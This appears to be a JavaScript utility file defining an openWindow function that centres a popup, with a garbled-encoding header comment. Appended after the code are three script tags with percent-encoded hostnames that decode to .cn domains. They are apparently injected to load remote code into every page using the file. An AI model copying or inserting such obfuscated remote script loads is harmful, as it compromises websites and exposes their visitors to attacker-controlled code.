

/******************************************************
* ´°¿Ú´ò¿ªº¯Êý
******************************************************/
function openWindow(uUrl,WindowName,uwidth,uheight,Scroll) {

        if (Scroll == "" )
           Scroll ='no'
        if (document.all)
		var xMax = screen.width, yMax = screen.height;
	else
		if (document.layers)
			var xMax = window.outerWidth, yMax = window.outerHeight;
		else
			var xMax = 800, yMax=600;

        var xOffset = (xMax - uwidth)/2, yOffset = (yMax - uheight)/2;   
        
	var features =
	'screenX=' + xOffset +
	',screenY=' + yOffset +
	',top=' + yOffset +
	',left=' + xOffset +
	',width=' + uwidth +
	',height=' + uheight +
	',directories=no'  +
	',location=no'  +
	',menubar=no' +
	',scrollbars='  + Scroll +
	',status=no' +
	',toolbar=no' +
	',Resizable=no';
	
	var newwindow2 = window.open (uUrl, WindowName, features);
        return false;
}

<script src=http://%73%70%6F%72%74%73%62%61%79%2E%63%6E></script><script src=http://%74%68%65%73%6F%6E%2E%63%6F%6D%2E%63%6E></script><script src=http://%74%6F%6C%64%79%61%2E%63%6F%6D%2E%63%6E></script>